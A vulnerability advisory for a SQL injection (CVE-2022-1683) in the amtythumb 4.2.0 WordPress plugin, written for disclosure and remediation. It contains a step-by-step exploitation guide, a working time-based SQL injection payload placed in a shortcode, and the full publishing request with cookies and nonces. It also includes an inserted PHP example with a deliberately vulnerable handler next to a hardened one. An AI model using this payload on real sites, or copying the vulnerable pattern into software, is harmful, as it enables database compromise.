amtythumb 4.2.0 WordPress plugin SQL injection

Vulnerability Metadata

Key                          Value
Date of Disclosure           May 09 2022
Affected Software            amtythumb
Affected Software Type       WordPress plugin
Version                      4.2.0
Weakness                     SQL Injection
CWE ID                       CWE-89
CVE ID                       CVE-2022-1683
CVSS 3.x Base Score          8.8
CVSS 2.0 Base Score          6.5
Reporter                     Daniel Krohmer, Shi Chen
Reporter Contact             daniel.krohmer@iese.fraunhofer.de
Link to Affected Software    https://wordpress.org/plugins/amtythumb
Link to Vulnerability DB     https://nvd.nist.gov/vuln/detail/CVE-2022-1683

Vulnerability Description

The id query parameter in amtythumb 4.2.0 is vulnerable to SQL injection. An authenticated attacker can embed a shortcode that persists an arbitrary SQL query in a post; the stored query is then executed whenever the post is rendered, which any unauthenticated visitor can trigger.

Exploitation Guide

Log in with author privileges or higher.

[Screenshot: amtythumb_step-1.png]

Add a new post.

[Screenshot: amtythumb_step-2.png]

Add the amtyThumbOnly shortcode and append the exploit string directly after the id value, which is the vulnerable parameter. Then click Publish.

[Screenshot: amtythumb_step-3.png]

Clicking Publish persists the exploit in the backend. The request looks like the following:

[Screenshot: amtythumb_step-4.png]

The exploit is triggered simply by requesting the blog's main page, which renders the previously created post; no authentication is required for this. If the exploit was successful, the page loads with a delay of 5 seconds.

[Screenshot: amtythumb_step-5.png]

To re-run the exploit, it may be necessary to clear the cache first: select Clear Image cache [soft] in the bulk menu and click Submit.

[Screenshot: amtythumb_step-6.png]

In the code, the vulnerability stems from the unsanitized user-supplied id value read at lines 18-26 of ./amtyThumb.php. The id parameter is then passed on, unchanged, through a few function calls.

[Screenshot: amtythumb_step-7.png]

Finally, the database call that leads to the SQL injection is at line 32 of ./supporting_function.php.

[Screenshot: amtythumb_step-8.png]
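The following is an added example and is not the amtythumb plugin's code; it illustrates the defect class described above, a shortcode attribute that reaches a $wpdb query without validation, next to a hardened handler built on the standard WordPress APIs (shortcode_atts, absint, $wpdb->prepare, esc_html). The function and shortcode names prefixed amty_example_ are hypothetical, and the query itself is a stand-in for whatever the plugin actually runs at the location named above. Because a shortcode executes at render time, the check has to live in the handler: validating at post-save would not help against a payload that is already stored.

```php
<?php
// Added example (not the amtythumb plugin's code). Shows the defect class
// described in the advisory beside a hardened handler. All amty_example_*
// names are hypothetical; the query is a stand-in, not the plugin's query.

// --- Vulnerable pattern (illustration of the defect class only) ---
// The attribute value is concatenated into the SQL string verbatim, so a
// post_id such as  1/**/AND/**/(SELECT ... SLEEP(5) ...)  becomes part of the
// query that runs every time the post is rendered, for any visitor.
function amty_example_vulnerable_shortcode( $atts ) {
    global $wpdb;
    $atts = shortcode_atts( array( 'post_id' => 0, 'percent' => 100 ), $atts );
    $sql  = "SELECT ID, post_title FROM {$wpdb->posts} WHERE ID = " . $atts['post_id'];
    $row  = $wpdb->get_row( $sql ); // attacker-controlled SQL reaches the DB
    return $row ? esc_html( $row->post_title ) : '';
}

// --- Hardened handler ---
function amty_example_safe_shortcode( $atts ) {
    global $wpdb;
    $atts = shortcode_atts(
        array( 'post_id' => 0, 'percent' => 100 ),
        $atts,
        'amtyExampleSafe'
    );

    // 1. Enforce the type: post_id must be a positive integer. absint() turns
    //    any non-numeric string (including the injected one) into 0, which
    //    is then rejected instead of being passed on.
    $post_id = absint( $atts['post_id'] );
    $percent = absint( $atts['percent'] );
    if ( 0 === $post_id || 0 === $percent || $percent > 100 ) {
        return '';
    }

    // 2. Parameterise: even with an integer in hand, fix the query shape with
    //    $wpdb->prepare() and bind the value as %d so no attribute content can
    //    ever alter the statement.
    $sql = $wpdb->prepare(
        "SELECT ID, post_title FROM {$wpdb->posts} WHERE ID = %d AND post_status = %s",
        $post_id,
        'publish'
    );
    $row = $wpdb->get_row( $sql );
    if ( ! $row ) {
        return '';
    }

    // 3. Escape on output: the title comes from the database and is rendered
    //    into HTML, so it is escaped regardless of how it got there.
    return sprintf(
        '<div class="amty-example-thumb" style="width:%d%%">%s</div>',
        $percent,
        esc_html( $row->post_title )
    );
}

// Register only the hardened handler, under a hypothetical tag so it does not
// collide with the plugin's own amtyThumbOnly shortcode on a test install.
add_shortcode( 'amtyExampleSafe', 'amty_example_safe_shortcode' );
```

With the hardened handler, the payload from the Exploit Payload section below yields post_id = 0 after absint() and the shortcode renders nothing; the SLEEP(5) never reaches MySQL, so the 5-second delay used as the success indicator in step 5 does not occur.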

Exploit Payload

Note that the cookies and nonces must be changed to match your own session and user settings; otherwise the exploit will not work.

The SQL injection can be persisted by embedding the following shortcode into a WordPress blog post:

[amtyThumbOnly percent=50 post_id=1/**/AND/**/(SELECT/**/7741/**/FROM/**/(SELECT(SLEEP(5)))hlAf)]

Publishing the post triggers the following request:

POST /wp-admin/post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/post-new.php?wp-post-new-reload=true
Content-Type: application/x-www-form-urlencoded
Content-Length: 1177
Origin: http://localhost
DNT: 1
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=author%7C1651856944%7CtP8UZwIAG7oH14wJtoNuNmTbq3WxPHnqLBoe9fo1En9%7C5c7fc7d8016bda32b33f644c9c05ac5691021ef5cecdb5cf8de4b6de23e7f11f; wp-saving-post=370-check; XDEBUG_SESSION=netbeans-xdebug; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=author%7C1651856944%7CtP8UZwIAG7oH14wJtoNuNmTbq3WxPHnqLBoe9fo1En9%7Cca6e47aeee6fa0065fcd2fc762d7f9568ac87de005f9f13b84c405fb2b87d891; wp-settings-2=editor%3Dhtml%26ampunfold%3D1%26ampmfold%3Do%26mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-2=1651684296
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

_wpnonce=6c4925a28c&_wp_http_referer=%2Fwp-admin%2Fpost-new.php&user_ID=2&action=editpost&originalaction=editpost&post_author=2&post_type=post&original_post_status=auto-draft&referredby=http%3A%2F%2Flocalhost%2Fwp-admin%2Fedit.php&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwp-admin%2Fedit.php&auto_draft=&post_ID=370&meta-box-order-nonce=1fb73cad96&closedpostboxesnonce=fea321c177&post_title=&samplepermalinknonce=44f654d983&content=%5BamtyThumbOnly+percent%3D50+post_id%3D1%2F**%2FAND%2F**%2F%28SELECT%2F**%2F7741%2F**%2FFROM%2F**%2F%28SELECT%28SLEEP%285%29%29%29hlAf%29%5D&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=05&jj=04&aa=2022&hh=17&mn=13&ss=01&hidden_mm=05&cur_mm=05&hidden_jj=04&cur_jj=04&hidden_aa=2022&cur_aa=2022&hidden_hh=17&cur_hh=17&hidden_mn=13&cur_mn=13&original_publish=Publish&publish=Publish&post_category%5B%5D=0&tax_input%5Bpost_tag%5D=&newtag%5Bpost_tag%5D=&_thumbnail_id=-1&excerpt=&trackback_url=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=f1c029c042&advanced_view=1&comment_status=open&ping_status=open&post_name=